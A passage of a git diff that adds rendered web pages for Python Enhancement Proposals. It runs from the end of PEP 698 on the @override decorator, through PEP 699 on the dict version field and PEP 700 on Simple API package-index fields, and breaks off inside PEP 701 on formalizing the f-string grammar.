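+
+# getattr with a fallback, since setting the attribute is best-effort only
+print(getattr(Child.foo, "__override__", False))  # True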
+
+

Limitations of setting __override__

+

As described above, adding __override__ may fail at runtime, in which +case we will simply return the argument as-is.

+

In addition, even in cases where it does work, it may be difficult for users to correctly work with multiple decorators, because successfully ensuring the __override__ attribute is set on the final output requires understanding the implementation of each decorator (a sketch of a safe ordering follows the list):

+
    +
  • The @override decorator needs to execute after ordinary decorators +like @functools.lru_cache that use wrapper functions, since we want to +set __override__ on the outermost wrapper. This means it needs to +go above all these other decorators.
  • +
  • But @override needs to execute before many special descriptor-based +decorators like @property, @staticmethod, and @classmethod.
  • +
  • As discussed above, in some cases (for example a descriptor with fixed +slots or a descriptor that also wraps) it may be impossible to set the +__override__ attribute at all.
  • +
+
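A sketch of a safe ordering for the wrapper-function case (the method name is hypothetical; @functools.cache is applied first so that __override__ lands on the outermost wrapper):
import functools
+from typing import override
+
+class Parent:
+    def slow(self, x: int) -> int:
+        return x * x
+
+class Child(Parent):
+    @override              # outermost: __override__ is set on the cached wrapper
+    @functools.cache       # creates the wrapper; applied before @override
+    def slow(self, x: int) -> int:
+        return x * x * x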

As a result, runtime support for setting __override__ is best effort +only, and we do not expect type checkers to validate the ordering of +decorators.

+
+
+
+

Rejected Alternatives

+
+

Rely on Integrated Development Environments for safety

+

Modern Integrated Development Environments (IDEs) often provide the ability to +automatically update subclasses when renaming a method. But we view this as +insufficient for several reasons:

+
    +
  • If a codebase is split into multiple projects, an IDE will not help and the +bug appears when upgrading dependencies. Type checkers are a fast way to catch +breaking changes in dependencies.
  • +
  • Not all developers use such IDEs. And library maintainers, even if they do use +an IDE, should not need to assume pull request authors use the same IDE. We +prefer being able to detect problems in continuous integration without +assuming anything about developers’ choice of editor.
  • +
+
+
+

Runtime enforcement

+

We considered having @typing.override enforce override safety at runtime, +similarly to how @overrides.overrides +does today.

+

We rejected this for four reasons:

+
    +
  • For users of static type checking, it is not clear this brings any benefits.
  • +
  • There would be at least some performance overhead, leading to slower imports for projects that enable runtime enforcement. We estimate the @overrides.overrides implementation takes around 100 microseconds, which is fast but could still add up to a second or more of extra initialization time in million-plus line codebases, which is exactly where we think @typing.override will be most useful.
  • +
  • An implementation may have edge cases where it doesn’t work well (we heard +from a maintainer of one such closed-source library that this has been a +problem). We expect static enforcement to be simple and reliable.
  • +
  • The implementation approaches we know of are not simple. The decorator +executes before the class is finished evaluating, so the options we know of +are either to inspect the bytecode of the caller (as @overrides.overrides +does) or to use a metaclass-based approach. Neither approach seems ideal.
  • +
+
+
+

Mark a base class to force explicit overrides on subclasses

+

We considered including a class decorator @require_explicit_overrides, which would have provided a way for base classes to declare that all subclasses must use the @override decorator on method overrides. The Overrides library has a mixin class, EnforceOverrides, which provides similar behavior in runtime checks.

+

We decided against this because we expect owners of large codebases will benefit +most from @override, and for these use cases having a strict mode where +explicit @override is required (see the Backward Compatibility section) +provides more benefits than a way to mark base classes.

+

Moreover we believe that authors of projects who do not consider the extra type +safety to be worth the additional boilerplate of using @override should not +be forced to do so. Having an optional strict mode puts the decision in the +hands of project owners, whereas the use of @require_explicit_overrides in +libraries would force project owners to use @override even if they prefer +not to.

+
+
+

Include the name of the ancestor class being overridden

+

We considered allowing the caller of @override to specify a specific +ancestor class where the overridden method should be defined:

+
class Parent0:
+    def foo(self) -> int:
+        return 1
+
+
+class Parent1:
+    def bar(self) -> int:
+        return 1
+
+
+class Child(Parent0, Parent1):
+    @override(Parent0)  # okay, Parent0 defines foo
+    def foo(self) -> int:
+        return 2
+
+    @override(Parent0)  # type error, Parent0 does not define bar
+    def bar(self) -> int:
+        return 2
+
+
+

This could be useful for code readability because it makes the override +structure more explicit for deep inheritance trees. It also might catch bugs by +prompting developers to check that the implementation of an override still makes +sense whenever a method being overridden moves from one base class to another.

+

We decided against it because:

+
    +
  • Supporting this would add complexity to the implementation of both +@override and type checker support for it, so there would need to +be considerable benefits.
  • +
  • We believe that it would be rarely used and catch relatively few bugs.
      +
    • The author of the +Overrides package has +noted +that early versions of his library included this capability but it was +rarely useful and seemed to have little benefit. After it was removed, the +ability was never requested by users.
    • +
    +
  • +
+
+
+
+

Reference Implementation

+

Pyre: A proof of concept is implemented in Pyre:

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0698.rst

+

Last modified: 2024-06-11 22:12:09 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0699/index.html b/pep-0699/index.html new file mode 100644 index 00000000000..a1ca56397e9 --- /dev/null +++ b/pep-0699/index.html @@ -0,0 +1,226 @@ + PEP 699 – Remove private dict version field added in PEP 509 | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 699 – Remove private dict version field added in PEP 509

+
+
Author:
+
Ken Jin <kenjin at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Created:
+
03-Oct-2022
+
Python-Version:
+
3.12
+
Post-History:
+
05-Oct-2022
+
Replaces:
+
509
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

PEP 509 introduced a private ma_version_tag field for dictionaries to +allow optimizations in CPython and extension libraries. This PEP proposes to +rescind PEP 509 and declare the field an implementation detail, as it has +already been superseded by alternatives. This will further allow the field to +be reused for future optimization.

+
+
+

Motivation

+

PEP 509 introduced the ma_version_tag field to dictionaries. This 64-bit field stored a version counter that was updated every time a dictionary was modified. The original proposal was to use this version counter as a guard for optimizations.

+

Since CPython 3.11, this field has become unused by internal optimization +efforts. PEP 659-specialized instructions use other methods of verifying +that certain optimizations are safe.

+

To enable further optimizations in CPython, this PEP proposes that the +ma_version_tag field no longer conform to the PEP 509 specification. +This will allow the CPython developers to store other optimization information, +such as dictionary write watchers.

+
+
+

Rationale

+

This PEP does not specify what the field may be used for in the future. This is +intentional, as implementation details are subject to change, and the field +should be used only for internal consumption by CPython.

+
+
+

Specification

+

This specification rescinds that in PEP 509. The ma_version_tag field of +the Python dict class is declared to be an internal implementation +detail and may be removed altogether, or may have a different representation. +C extensions should not rely on this field.

+
+
+

Backwards Compatibility

+

Certain extensions use ma_version_tag for fast dictionary or globals +lookups. For example, +Cython uses the field for fast dynamic module variable lookups.

+

This PEP proposes to emit a compiler warning when accessing ma_version_tag. +After two consecutive version releases with warnings, ma_version_tag +will be removed, in line with PEP 387.

+

The biggest user the author could find for this field was Cython. +Discussions with a Cython maintainer indicated that +removing support for it from Cython is trivial.

+
+
+

Security Implications

+

PEP 509 was concerned with integer overflow. However, this PEP does not +introduce any additional security concerns.

+
+
+

Rejected Ideas

+

A possible alternative is to preserve the field for backwards compatibility. +This PEP rejects that alternative as future optimizations will consume more +memory, and the field was always considered private and undocumented aside +from the PEP, with no backward compatibility guarantees. Dictionaries in Python +are commonly used, and any increase in their memory consumption will adversely +affect Python’s performance.

+
+
+

Reference Implementation

+

A reference implementation can be found in +python/cpython#101193.

+
+
+

Special Thanks

+

Thanks to C.A.M. Gerlach for edits and wording changes to this document. +Thanks also to Mark Shannon and Kumar Aditya for providing possible +implementations.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0699.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0700/index.html b/pep-0700/index.html new file mode 100644 index 00000000000..4afeec54c78 --- /dev/null +++ b/pep-0700/index.html @@ -0,0 +1,315 @@ + PEP 700 – Additional Fields for the Simple API for Package Indexes | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 700 – Additional Fields for the Simple API for Package Indexes

+
+
Author:
+
Paul Moore <p.f.moore at gmail.com>
+
PEP-Delegate:
+
Donald Stufft <donald at stufft.io>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
21-Oct-2022
+
Post-History:
+
21-Oct-2022
+
Resolution:
+
19-Dec-2022
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Simple repository API, is maintained on the PyPA specs page.

+


+

See the PyPA specification update process for how to propose changes.

+
+
+

Abstract

+

PEP 691 defined a JSON form for the “Simple Repository API”. This allowed +clients to more easily query the data that was previously only available in +HTML, as defined in PEP 503.

+

This proposal adds three fields to the JSON form, which allow it to be used in +place of PyPI’s JSON API +in a number of situations.

+
    +
  • A field to allow retrieval of a list of all the published versions of a project.
  • +
  • Fields containing the size and upload time for a project file.
  • +
+

The new fields are all part of the data returned from the “project details” URL.

+
+
+

Rationale

+

With the introduction of the JSON form of the simple API in PEP 691, the simple API offers functionality that is almost as complete as the PyPI JSON API. This PEP adds a number of fields which were previously only available through the JSON API, in order to allow clients that were previously Warehouse-specific to support arbitrary standards-compliant indexes.

+
+
+

Specification

+

This specification defines version 1.1 of the simple repository API. For the +HTML version of the API, there is no change from version 1.0. For the JSON +version of the API, the following changes are made:

+
    +
  • The api-version must specify version 1.1 or later.
  • +
  • A new versions key is added at the top level.
  • +
  • Two new “file information” keys, size and upload-time, are added to +the files data.
  • +
  • Keys (at any level) with a leading underscore are reserved as private for +index server use. No future standard will assign a meaning to any such key.
  • +
+

The versions and size keys are mandatory. The upload-time key is +optional.

+
+

Versions

+

An additional key, versions, MUST be present at the top level, in addition to the keys name, files and meta defined in PEP 691. This key MUST contain a list of version strings specifying all of the project versions uploaded for this project. The value is logically a set, and as such may not contain duplicates, and the order of the values is not significant.

+

All of the files listed in the files key MUST be associated with one of the +versions in the versions key. The versions key MAY contain versions with +no associated files (to represent versions with no files uploaded, if the server +has such a concept).

+

Note that because servers may hold “legacy” data from before the adoption of +PEP 440, version strings currently cannot be required to be valid PEP 440 +versions, and therefore cannot be assumed to be orderable using the PEP 440 +rules. However, servers SHOULD use normalised PEP 440 versions where +possible.

+
+
+

Additional file information

+

Two new keys are added to the files key.

+
    +
  • size: This field is mandatory. It MUST contain an integer which is the +file size in bytes.
  • +
  • upload-time: This field is optional. If present, it MUST contain a valid +ISO 8601 date/time string, in the format yyyy-mm-ddThh:mm:ss.ffffffZ, +which represents the time the file was uploaded to the index. As indicated by +the Z suffix, the upload time MUST use the UTC timezone. The fractional +seconds part of the timestamp (the .ffffff part) is optional, and if +present may contain up to 6 digits of precision. If a server does not record +upload time information for a file, it MAY omit the upload-time key.
  • +
+
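Putting the new and existing keys together, a version 1.1 "project details" response could look like the following sketch (shown here as a Python literal; the project name and file data are hypothetical):

project_details = {
    "meta": {"api-version": "1.1"},
    "name": "example-project",
    # Mandatory: every uploaded version; logically a set, order not significant.
    "versions": ["1.0", "1.1", "2.0"],
    "files": [
        {
            "filename": "example_project-2.0-py3-none-any.whl",
            "url": "https://files.example.test/example_project-2.0-py3-none-any.whl",
            "hashes": {"sha256": "..."},
            "size": 23942,  # mandatory: file size in bytes
            "upload-time": "2023-01-09T14:21:33.123456Z",  # optional: UTC upload time
        },
    ],
}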
+
+
+

FAQ

+
+

Why not add this data to the HTML API as well?

+

It would be possible to add the data to the HTML API, but the vast majority of +consumers for this data are likely to be currently getting it from the PyPI JSON +API, and so will already be expecting to parse JSON. Traditional consumers of +the HTML API have never needed this data previously.

+
+
+

Does this imply that the HTML API is obsolete?

+

No. The FAQ of PEP 691 was clear that the HTML API is not being deprecated, +and this PEP does not change that position. However, clients wishing to access +the new data introduced by this PEP will need to use the JSON API to get it. And +indexes wanting to provide it will need to serve the JSON format.

+
+
+

Is the simple API replacing the Warehouse JSON and XML-RPC APIs?

+

Where possible, clients should prefer the simple API over the JSON or XML-RPC +APIs, as the former is standardised and can be assumed to be available from any +index, whereas the latter are exclusive to the Warehouse project.

+

However, while this PEP brings the simple API closer to being able to replace +the JSON API, there is no formal policy that the simple API will replicate all +of the functionality covered by the existing Warehouse APIs. Proposed additions +to the simple API will still be considered on their individual merits, and the +requirement that the API should be simple and fast for the primary use case of +locating files for a project will remain the overriding consideration.

+
+
+

Why not allow other date formats?

+

The ISO 8601 standard is complex, and there seems little value in requiring +clients to deal with that. The standard library datetime module provides +methods to parse ISO 8601 strings, but it is possible that users may want to +access index data without using Python (for example, piping the output of +curl into jq). Having a single, well-defined format makes this easier, +and doesn’t have any significant disadvantages.
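For example, on Python 3.11 and later (where datetime.fromisoformat() accepts the Z suffix), the fixed format can be parsed directly:

from datetime import datetime

# The fractional seconds part (.ffffff) is optional, so both of these parse:
for raw in ("2023-01-09T14:21:33.123456Z", "2023-01-09T14:21:33Z"):
    print(datetime.fromisoformat(raw))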

+
+
+

What if file sizes are too big for a JSON number?

+

The JSON standard does not specify how numbers are to be interpreted. Python can +read and write arbitrary-length integers in a JSON file, so this should not be +an issue for code written in Python. Non-Python implementations may need to take +care to handle large integers correctly, but this is not expected to be a +significant problem.

+
+
+

Why not require PEP 440 versions?

+

At the time this PEP was written, PyPI still contains (and serves) projects and +files with “legacy” versions. Requiring PEP 440 versions would make it +impossible for PyPI to follow this specification while still serving the +existing content.

+

Ideally, at some future time, the simple index API will be updated to require +PEP 440 versions, at which time this specification should be updated to +reflect that. However, that change will need to be co-ordinated with existing +index providers including PyPI, to desupport and remove non-conforming projects +and/or files.

+
+
+

Why not provide a “latest version” value?

+

For PEP 440 versions, this is easy enough for the client to do (using the +packaging library, latest = max(Version(s) for s in proj["versions"])). +For non-standard versions, there is no well-defined ordering, and clients will +need to decide on what rule is appropriate for their needs. Requiring the server +to supply a latest version value takes the choice away from the client.
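Expanded into a runnable form, the inline snippet above looks like this (assuming the third-party packaging library and a response containing the versions key from this PEP):

from packaging.version import Version

proj = {"versions": ["1.0", "1.1", "2.0"]}  # e.g. parsed from the project details URL
latest = max(Version(s) for s in proj["versions"])
print(latest)  # 2.0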

+

Servers with an explicit concept of which version is the “latest”, which cannot +be calculated from data available to the client, can provide a non-standard, +underscore-prefixed key to convey that information to the client if they wish.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0700.rst

+

Last modified: 2024-10-17 12:49:39 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0701/index.html b/pep-0701/index.html new file mode 100644 index 00000000000..9b8c1de35c2 --- /dev/null +++ b/pep-0701/index.html @@ -0,0 +1,713 @@ + PEP 701 – Syntactic formalization of f-strings | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 701 – Syntactic formalization of f-strings

+
+
Author:
+
Pablo Galindo <pablogsal at python.org>, +Batuhan Taskaya <batuhan at python.org>, +Lysandros Nikolaou <lisandrosnik at gmail.com>, +Marta Gómez Macías <cyberwitch at google.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Created:
+
15-Nov-2022
+
Python-Version:
+
3.12
+
Post-History:
+
19-Dec-2022
+
Resolution:
+
14-Mar-2023
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document proposes to lift some of the restrictions originally formulated in +PEP 498 and to provide a formalized grammar for f-strings that can be +integrated into the parser directly. The proposed syntactic formalization of +f-strings will have some small side-effects on how f-strings are parsed and +interpreted, allowing for a considerable number of advantages for end users and +library developers, while also dramatically reducing the maintenance cost of +the code dedicated to parsing f-strings.

+
+
+

Motivation

+

When f-strings were originally introduced in PEP 498, the specification was provided without a formal grammar for f-strings. Additionally, the specification contains several restrictions that were imposed so the parsing of f-strings could be implemented into CPython without modifying the existing lexer. These limitations were recognized previously, and an attempt to lift them was made in PEP 536, but none of that work was ever implemented. Some of these limitations (collected originally by PEP 536) are:

+
    +
  1. It is impossible to use the quote character delimiting the f-string +within the expression portion:
    >>> f'Magic wand: { bag['wand'] }'
    +                             ^
    +SyntaxError: invalid syntax
    +
    +
    +
  2. +
  3. A previously considered way around it would lead to escape sequences +in executed code and is prohibited in f-strings:
    >>> f'Magic wand { bag[\'wand\'] } string'
    +SyntaxError: f-string expression portion cannot include a backslash
    +
    +
    +
  4. +
  5. Comments are forbidden even in multi-line f-strings:
    >>> f'''A complex trick: {
    +... bag['bag']  # recursive bags!
    +... }'''
    +SyntaxError: f-string expression part cannot include '#'
    +
    +
    +
  6. +
  7. Arbitrary nesting of expressions without expansion of escape sequences is +available in many other languages that employ a string interpolation +method that uses expressions instead of just variable names. Some examples:
    # Ruby
    +"#{ "#{1+2}" }"
    +
    +# JavaScript
    +`${`${1+2}`}`
    +
    +# Swift
    +"\("\(1+2)")"
    +
    +# C#
    +$"{$"{1+2}"}"
    +
    +
    +
  8. +
+

These limitations serve no purpose from a language user perspective and +can be lifted by giving f-string literals a regular grammar without exceptions +and implementing it using dedicated parse code.

+

The other issue that f-strings have is that the current implementation in CPython relies on tokenising f-strings as STRING tokens and post-processing these tokens. This has the following problems:

+
    +
  1. It adds a considerable maintenance cost to the CPython parser. This is because +the parsing code needs to be written by hand, which has historically led to a +considerable number of inconsistencies and bugs. Writing and maintaining parsing +code by hand in C has always been considered error prone and dangerous as it needs +to deal with a lot of manual memory management over the original lexer buffers.
  2. +
  3. The f-string parsing code is not able to use the new, improved error message mechanisms that the new PEG parser, originally introduced in PEP 617, has allowed. The improvements that these error messages brought have been greatly celebrated, but unfortunately f-strings cannot benefit from them because they are parsed in a separate piece of the parsing machinery. This is especially unfortunate, since there are several syntactical features of f-strings that can be confusing due to the different implicit tokenization that happens inside the expression part (for instance f"{y:=3}" is not an assignment expression).
  4. +
  5. Other Python implementations have no way to know if they have implemented +f-strings correctly because contrary to other language features, they are not +part of the official Python grammar. +This is important because several prominent +alternative implementations are using CPython’s PEG parser, such as PyPy, +and/or are basing their grammars on the official PEG grammar. The +fact that f-strings use a separate parser prevents these alternative implementations +from leveraging the official grammar and benefiting from improvements in error messages derived +from the grammar.
  6. +
+

A version of this proposal was originally discussed on Python-Dev and +presented at the Python Language Summit 2022 where it was enthusiastically +received.

+
+
+

Rationale

+

By building on top of the new Python PEG Parser (PEP 617), this PEP proposes +to redefine “f-strings”, especially emphasizing the clear separation of the +string component and the expression (or replacement, {...}) component. PEP 498 +summarizes the syntactical part of “f-strings” as the following:

+
+
In Python source code, an f-string is a literal string, prefixed with ‘f’, which +contains expressions inside braces. The expressions are replaced with their values.
+

However, PEP 498 also contained a formal list of exclusions on what +can or cannot be contained inside the expression component (primarily due to the +limitations of the existing parser). By clearly establishing the formal grammar, we +now also have the ability to define the expression component of an f-string as truly “any +applicable Python expression” (in that particular context) without being bound +by the limitations imposed by the details of our implementation.

+

The formalization effort and the premise above also have a significant benefit for Python programmers, as they simplify and eliminate obscure limitations. This reduces the mental burden and the cognitive complexity of f-string literals (as well as of the Python language in general).

+
    +
  1. The expression component can include any string literal that a normal Python expression +can include. This opens up the possibility of nesting string literals (formatted or +not) inside the expression component of an f-string with the same quote type (and length):
    >>> f"These are the things: {", ".join(things)}"
    +
    +>>> f"{source.removesuffix(".py")}.c: $(srcdir)/{source}"
    +
    +>>> f"{f"{f"infinite"}"}" + " " + f"{f"nesting!!!"}"
    +
    +
    +

    This “feature” is not universally agreed to be desirable, and some users find this unreadable. +For a discussion on the different views on this, see the considerations regarding quote reuse section.

    +
  2. +
  3. Another issue that has felt unintuitive to most is the lack of support for backslashes +within the expression component of an f-string. One example that keeps coming up is including +a newline character in the expression part for joining containers. For example:
    >>> a = ["hello", "world"]
    +>>> f"{'\n'.join(a)}"
    +File "<stdin>", line 1
    +    f"{'\n'.join(a)}"
    +                    ^
    +SyntaxError: f-string expression part cannot include a backslash
    +
    +
    +

    A common work-around for this was to either assign the newline to an intermediate variable or +pre-create the whole string prior to creating the f-string:

    +
    >>> a = ["hello", "world"]
    +>>> joined = '\n'.join(a)
    +>>> f"{joined}"
    +'hello\nworld'
    +
    +
    +

    It only feels natural to allow backslashes in the expression part now that the new PEG parser +can easily support it.

    +
    >>> a = ["hello", "world"]
    +>>> f"{'\n'.join(a)}"
    +'hello\nworld'
    +
    +
    +
  4. +
  5. Before the changes proposed in this document, there was no explicit limit on how deeply f-strings can be nested, but the fact that string quotes cannot be reused inside the expression component of f-strings made it impossible to nest f-strings arbitrarily. In fact, this is the most deeply nested f-string that can be written:
    >>> f"""{f'''{f'{f"{1+1}"}'}'''}"""
    +'2'
    +
    +
    +

    As this PEP allows placing any valid Python expression inside the +expression component of the f-strings, it is now possible to reuse quotes and +therefore is possible to nest f-strings arbitrarily:

    +
    >>> f"{f"{f"{f"{f"{f"{1+1}"}"}"}"}"}"
    +'2'
    +
    +
    +

    Although this is just a consequence of allowing arbitrary expressions, the +authors of this PEP do not believe that this is a fundamental benefit and we +have decided that the language specification will not explicitly mandate that +this nesting can be arbitrary. This is because allowing arbitrarily-deep +nesting imposes a lot of extra complexity to the lexer implementation +(particularly as lexer/parser pipelines need to allow “untokenizing” to +support the ‘f-string debugging expressions’ and this is especially taxing when +arbitrary nesting is allowed). Implementations are therefore free to impose a +limit on the nesting depth if they need to. Note that this is not an uncommon +situation, as the CPython implementation already imposes several limits all +over the place, including a limit on the nesting depth of parentheses and +brackets, a limit on the nesting of the blocks, a limit in the number of +branches in if statements, a limit on the number of expressions in +star-unpacking, etc.

    +
  6. +
+
+
+

Specification

+

The formal proposed PEG grammar specification for f-strings is (see PEP 617 +for details on the syntax):

+
fstring
+    | FSTRING_START fstring_middle* FSTRING_END
+fstring_middle
+    | fstring_replacement_field
+    | FSTRING_MIDDLE
+fstring_replacement_field
+    | '{' (yield_expr | star_expressions) "="? [ "!" NAME ] [ ':' fstring_format_spec* ] '}'
+fstring_format_spec:
+    | FSTRING_MIDDLE
+    | fstring_replacement_field
+
+
+

The new tokens (FSTRING_START, FSTRING_MIDDLE, FSTRING_END) are defined +later in this document.

+

This PEP leaves up to the implementation the level of f-string nesting allowed (f-strings within the expression parts of other f-strings) but specifies a lower bound of 5 levels of nesting. This is to ensure that users can have a reasonable expectation of being able to nest f-strings with "reasonable" depth. In other words, a nesting limit is not part of the language specification, but neither does the specification mandate support for arbitrary nesting.

+

Similarly, this PEP leaves up to the implementation the level of expression nesting +in format specifiers but specifies a lower bound of 2 levels of nesting. This means +that the following should always be valid:

+
f"{'':*^{1:{1}}}"
+
+
+

but the following can be valid or not depending on the implementation:

+
f"{'':*^{1:{1:{1}}}}"
+
+
+

The new grammar will preserve the Abstract Syntax Tree (AST) of the current +implementation. This means that no semantic changes will be introduced by this +PEP on existing code that uses f-strings.

+
+

Handling of f-string debug expressions

+

Since Python 3.8, f-strings can be used to debug expressions by using the += operator. For example:

+
>>> a = 1
+>>> f"{1+1=}"
+'1+1=2'
+
+
+

These semantics were not introduced formally in a PEP; they were implemented in the current string parser as a special case in bpo-36817 and documented in the f-string lexical analysis section.

+

This feature is not affected by the changes proposed in this PEP, but it is important to specify that the formal handling of this feature requires the lexer to be able to "untokenize" the expression part of the f-string. This is not a problem for the current string parser, as it can operate directly on the string token contents. However, incorporating this feature into a given parser implementation requires the lexer to keep track of the raw string contents of the expression part of the f-string and make them available to the parser when the parse tree is constructed for f-string nodes. A pure "untokenization" is not enough because, as currently specified, f-string debug expressions preserve whitespace in the expression, including spaces after the { and the = characters. This means that the raw string contents of the expression part of the f-string must be kept intact and not just the associated tokens.
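For instance, the whitespace inside the braces of a debug expression is reproduced verbatim in the result (CPython behaviour since 3.8):

x = 7
print(f"{x+1=}")       # 'x+1=8'
print(f"{ x + 1 = }")  # ' x + 1 = 8' -- the spacing is preserved exactly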

+

How parser/lexer implementations deal with this problem is of course up to the +implementation.

+
+
+

New tokens

+

Three new tokens are introduced: FSTRING_START, FSTRING_MIDDLE and +FSTRING_END. Different lexers may have different implementations that may be +more efficient than the ones proposed here given the context of the particular +implementation. However, the following definitions will be used as part of the +public APIs of CPython (such as the tokenize module) and are also provided +as a reference so that the reader can have a better understanding of the +proposed grammar changes and how the tokens are used:

+
    +
  • FSTRING_START: This token includes the f-string prefix (f/F/fr) and the opening quote(s).
  • +
  • FSTRING_MIDDLE: This token includes a portion of text inside the string that’s not part of the +expression part and isn’t an opening or closing brace. This can include the text between the opening quote +and the first expression brace ({), the text between two expression braces (} and {) and the text +between the last expression brace (}) and the closing quote.
  • +
  • FSTRING_END: This token includes the closing quote.
  • +
+

These tokens are always string parts and they are semantically equivalent to the +STRING token with the restrictions specified. These tokens must be produced by the lexer +when lexing f-strings. This means that the tokenizer cannot produce a single token for f-strings anymore. +How the lexer emits this token is not specified as this will heavily depend on every +implementation (even the Python version of the lexer in the standard library is implemented +differently to the one used by the PEG parser).

+

As an example:

+
f'some words {a+b:.3f} more words {c+d=} final words'
+
+
+

will be tokenized as:

+
FSTRING_START - "f'"
+FSTRING_MIDDLE - 'some words '
+LBRACE - '{'
+NAME - 'a'
+PLUS - '+'
+NAME - 'b'
+OP - ':'
+FSTRING_MIDDLE - '.3f'
+RBRACE - '}'
+FSTRING_MIDDLE - ' more words '
+LBRACE - '{'
+NAME - 'c'
+PLUS - '+'
+NAME - 'd'
+OP - '='
+RBRACE - '}'
+FSTRING_MIDDLE - ' final words'
+FSTRING_END - "'"
+
+
+

while f"""some words""" will be tokenized simply as:

+
FSTRING_START - 'f"""'
+FSTRING_MIDDLE - 'some words'
+FSTRING_END - '"""'
+
+
+
+
+

Changes to the tokenize module

+

The tokenize module will be adapted to emit these tokens as described in the previous section +when parsing f-strings so tools can take advantage of this new tokenization schema and avoid having +to implement their own f-string tokenizer and parser.
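As a quick illustration, on an implementation that has adopted the new tokens (such as CPython 3.12 and later), the new tokenization can be observed directly:

import io
import tokenize

code = 'f"hello {name}"\n'
for tok in tokenize.generate_tokens(io.StringIO(code).readline):
    print(tokenize.tok_name[tok.type], repr(tok.string))
# The output is expected to include FSTRING_START 'f"', FSTRING_MIDDLE 'hello ',
# OP '{', NAME 'name', OP '}' and FSTRING_END '"'.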

+
+
+

How to produce these new tokens

+

One way existing lexers can be adapted to emit these tokens is to incorporate a +stack of “lexer modes” or to use a stack of different lexers. This is because +the lexer needs to switch from “regular Python lexing” to “f-string lexing” when +it encounters an f-string start token and as f-strings can be nested, the +context needs to be preserved until the f-string closes. Also, the “lexer mode” +inside an f-string expression part needs to behave as a “super-set” of the +regular Python lexer (as it needs to be able to switch back to f-string lexing +when it encounters the } terminator for the expression part as well as +handling f-string formatting and debug expressions). For reference, here is a +draft of the algorithm to modify a CPython-like tokenizer to emit these new +tokens:

+
    +
  1. If the lexer detects that an f-string is starting (by detecting the letter +‘f/F’ and one of the possible quotes) keep advancing until a valid quote is +detected (one of ", """, ' or ''') and emit a +FSTRING_START token with the contents captured (the ‘f/F’ and the +starting quote). Push a new tokenizer mode to the tokenizer mode stack for +“F-string tokenization”. Go to step 2.
  2. +
  3. Keep consuming tokens until one of the following is encountered:
      +
    • A closing quote equal to the opening quote.
    • +
    • If in “format specifier mode” (see step 3), an opening brace ({), a +closing brace (}), or a newline token (\n).
    • +
    • If not in “format specifier mode” (see step 3), an opening brace ({) or +a closing brace (}) that is not immediately followed by another opening/closing +brace.
    • +
    +

    In all cases, if the character buffer is not empty, emit a FSTRING_MIDDLE +token with the contents captured so far but transform any double +opening/closing braces into single opening/closing braces. Now, proceed as +follows depending on the character encountered:

    +
      +
    • If a closing quote matching the opening quote is encountered, go to step 4.
    • +
    • If an opening bracket (not immediately followed by another opening bracket) +is encountered, go to step 3.
    • +
    • If a closing bracket (not immediately followed by another closing bracket) +is encountered, emit a token for the closing bracket and go to step 2.
    • +
    +
  4. +
  5. Push a new tokenizer mode to the tokenizer mode stack for "Regular Python tokenization within f-string" and proceed to tokenize with it. This mode tokenizes as the "Regular Python tokenization" until a : or a } character is encountered with the same level of nesting as the opening bracket token that was pushed when we entered the f-string part. Using this mode, emit tokens until one of the stop points is reached. When this happens, emit the corresponding token for the stopping character encountered, pop the current tokenizer mode from the tokenizer mode stack, and go to step 2. If the stopping point is a : character, enter step 2 in "format specifier" mode.
  6. +
  7. Emit a FSTRING_END token with the contents captured and pop the current +tokenizer mode (corresponding to “F-string tokenization”) and go back to +“Regular Python mode”.
  8. +
+

Of course, as mentioned before, it is not possible to provide a precise +specification of how this should be done for an arbitrary tokenizer as it will +depend on the specific implementation and nature of the lexer to be changed.

+
+
+

Consequences of the new grammar

+

All restrictions mentioned in the PEP are lifted from f-string literals, as explained below:

+
    +
  • Expression portions may now contain strings delimited with the same kind of +quote that is used to delimit the f-string literal.
  • +
  • Backslashes may now appear within expressions just like anywhere else in +Python code. In case of strings nested within f-string literals, escape sequences are +expanded when the innermost string is evaluated.
  • +
  • New lines are now allowed within expression brackets. This means that these are now allowed:
    >>> x = 1
    +>>> f"___{
    +...     x
    +... }___"
    +'___1___'
    +
    +>>> f"___{(
    +...     x
    +... )}___"
    +'___1___'
    +
    +
    +
  • +
  • Comments, using the # character, are allowed within the expression part of an f-string. Note that comments require the closing bracket (}) of the expression part to be on a different line from the one the comment is on; otherwise the bracket will be ignored as part of the comment.
  • +
+
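The lifted restrictions can be seen together in a short example (valid on implementations of this PEP, such as CPython 3.12 and later; the names are illustrative):

songs = ["Blue", "Green", "Red"]

print(f"Playlist: {", ".join(songs)}")  # quote reuse inside the expression
print(f"{'\n'.join(songs)}")            # backslashes are now allowed
print(f"First: {
    songs[0]  # comments and newlines are allowed inside the braces
}")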
+
+

Considerations regarding quote reuse

+

One of the consequences of the grammar proposed here is that, as mentioned above, +f-string expressions can now contain strings delimited with the same kind of quote +that is used to delimit the external f-string literal. For example:

+
>>> f" something { my_dict["key"] } something else "
+
+
+

In the discussion thread for this PEP, +several concerns have been raised regarding this aspect and we want to collect them here, +as these should be taken into consideration when accepting or rejecting this PEP.

+

Some of these objections include:

+
    +
  • Many people find quote reuse within the same string confusing and hard to read. This is because allowing quote reuse will violate a property of Python as it stands today: the fact that strings are fully delimited by two matching occurrences of the same kind of quote, which by itself is a very simple rule. One of the reasons quote reuse may be harder for humans to parse, leading to less readable code, is that the quote character is the same for both start and end (as opposed to other delimiters).
  • +
